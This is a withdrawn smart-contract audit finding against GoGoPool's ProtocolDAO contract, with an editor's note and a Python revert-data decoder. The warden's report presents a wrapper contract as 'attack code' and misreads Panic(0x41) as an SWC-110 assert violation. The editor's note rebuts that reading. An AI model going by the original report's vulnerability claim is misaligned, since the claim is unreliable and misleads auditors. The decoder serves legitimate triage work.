code-423n4 / 2022-12-gogopool-findings


SWC-110 A user-provided assertion failed. Invalid input is successfully being parsed. ProtocolDAO #295

Closed code423n4 closed 1 year ago

code423n4 commented 1 year ago

Lines of code

https://github.com/code-423n4/2022-12-gogopool/blob/aec9928d8bdce8a5a4efe45f54c39d4fc7313731/contracts/contract/ProtocolDAO.sol#L73-L75

Vulnerability details

[M-02]

Impact

SWC-110 A user-provided assertion failed with the message 'Panic(0x41)'. The first transaction failed, but the second transaction was a success. Invalid input is successfully being parsed.

Proof of Concept

Step 1: Transaction 1 (contract creation)
In Remix IDE, deploy the victim ProtocolDAO.sol contract with this address: 0xaffeaffeaffeaffeaffeaffeaffeaffeaffeaffe (Creator)
In Remix IDE, call the victim function with this contract name: ProtocolDAO.resumeContract("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")
Results: Fail

Step 2: Transaction 2
In Remix IDE, deploy the AttackProtocolDAO.sol contract with this address: 0xaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa2
In Remix IDE, call the attack function with this contract name: protocoldao.resumeContract("0x312fb2be000000000000000000000000000000000000000000000000000000000000002800000000000000000000000000fb0000000000000000000000000000000000000000000000000000")
Results: Success and value: address: 0xAaAaaAAAaAaaAaAaAaaAAaAaAAAAAaAAAaaAaAa2

Attack Code:

// SPDX-License-Identifier: GPL-3.0-only
// ^0.8.0 so this compiles alongside the audited ProtocolDAO.sol, which targets 0.8.x.
pragma solidity ^0.8.0;

// Remix-style import of the audited contract (the original also pulled in Base,
// TokenGGP and Storage, none of which this contract uses).
import "./ProtocolDAO.sol";

/// @title Wrapper that forwards a fixed string to ProtocolDAO.resumeContract
/// @notice Deployed from a second account in Remix; see Step 2 above.
contract AttackProtocolDAO {
    ProtocolDAO public protocoldao;

    // Constructors take no visibility keyword from Solidity 0.7 onward.
    constructor(address _protocoldao) {
        protocoldao = ProtocolDAO(_protocoldao);
    }

    /// @notice Ignores the caller's argument and always forwards the hard-coded
    ///         contract name below, exactly as in the reported PoC.
    function resumeContract(string memory /* contractName */) public {
        protocoldao.resumeContract(
            "0x312fb2be000000000000000000000000000000000000000000000000000000000000002800000000000000000000000000fb0000000000000000000000000000000000000000000000000000"
        );
    }
}

Tools Used

Remix IDE

Recommended Mitigation Steps

code423n4 commented 1 year ago

Withdrawn by debo
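
Editor's note on the 'Panic(0x41)' cited in the report above. SWC-110 (Assert Violation) covers reverts produced by a user-written assert(), which Solidity encodes as Panic(0x01); code 0x41 is the compiler's "too much memory allocated or array too large" panic and is raised by compiler-inserted checks (Solidity's ABI decoder emits it, for example, when a dynamic argument such as a string carries an implausibly large length word), so it is not evidence that an assertion in the contract was reached or that malformed input was accepted. The decoder below is an added example, not code from the warden's report or the GoGoPool repository; its sample payloads are constructed by hand and were not captured from the Remix session described above.

```python
"""Decode Solidity revert data into Error(string) / Panic(uint256) / other.

Added example for this thread, not code from the warden's report or the
GoGoPool repository. The sample payloads below are constructed by hand;
nothing here was captured from the Remix session the report describes.
"""

# Selectors for the two revert formats the compiler itself emits:
# bytes4(keccak256("Error(string)")) and bytes4(keccak256("Panic(uint256)")).
ERROR_SELECTOR = bytes.fromhex("08c379a0")
PANIC_SELECTOR = bytes.fromhex("4e487b71")

# Panic codes as listed in the Solidity documentation.
PANIC_CODES = {
    0x00: "generic compiler-inserted panic",
    0x01: "assert(false) evaluated",
    0x11: "arithmetic overflow or underflow outside an unchecked block",
    0x12: "division or modulo by zero",
    0x21: "conversion of an out-of-range value to an enum",
    0x22: "access of an incorrectly encoded storage byte array",
    0x31: ".pop() on an empty array",
    0x32: "array index out of bounds",
    0x41: "too much memory allocated, or array too large",
    0x51: "call through a zero-initialized internal function pointer",
}


def encode_panic(code: int) -> bytes:
    """Build the revert data solc emits for Panic(code): selector + uint256."""
    return PANIC_SELECTOR + code.to_bytes(32, "big")


def encode_error(message: str) -> bytes:
    """Build the revert data solc emits for Error(message): selector + ABI string."""
    raw = message.encode("utf-8")
    padded = raw + b"\x00" * (-len(raw) % 32)
    # ABI layout of a single dynamic argument: offset (always 32 here), length, bytes.
    return ERROR_SELECTOR + (32).to_bytes(32, "big") + len(raw).to_bytes(32, "big") + padded


def decode_revert(data: bytes) -> dict:
    """Classify raw revert data; never raises on malformed input."""
    if not data:
        return {"kind": "empty"}  # plain revert(), out of gas, or invalid opcode

    selector, body = data[:4], data[4:]

    if selector == PANIC_SELECTOR and len(body) == 32:
        code = int.from_bytes(body, "big")
        return {
            "kind": "Panic",
            "code": code,
            "reason": PANIC_CODES.get(code, "unknown panic code"),
            # Only 0x01 comes from a user-written assert(); SWC-110 is about that case.
            "is_assert": code == 0x01,
        }

    if selector == ERROR_SELECTOR and len(body) >= 64:
        offset = int.from_bytes(body[:32], "big")
        if offset + 32 > len(body):
            return {"kind": "malformed", "selector": selector.hex()}
        length = int.from_bytes(body[offset:offset + 32], "big")
        start = offset + 32
        if start + length > len(body):
            return {"kind": "malformed", "selector": selector.hex()}
        text = body[start:start + length].decode("utf-8", "replace")
        return {"kind": "Error", "message": text}

    # Custom error (Solidity >= 0.8.4) or hand-crafted revert data.
    return {"kind": "custom", "selector": selector.hex(), "body": body.hex()}


# Constructed sample: the wire form of the Panic(0x41) named in the report,
# i.e. the Panic selector followed by 0x41 as a uint256.
SAMPLE_PANIC_0X41 = bytes.fromhex("4e487b71" + "41".rjust(64, "0"))


if __name__ == "__main__":
    for payload in (SAMPLE_PANIC_0X41, encode_panic(0x01), encode_error("not guardian"), b""):
        print(decode_revert(payload))
```

Run against the raw revert bytes a node returns (eth_call / debug trace output), the decoder separates the three cases a triage should distinguish: a Panic whose code tells you which compiler-inserted check fired, an Error(string) carrying a require() message, and anything else (custom errors or arbitrary data). Only a Panic with code 0x01 corresponds to the assert violation that SWC-110 describes.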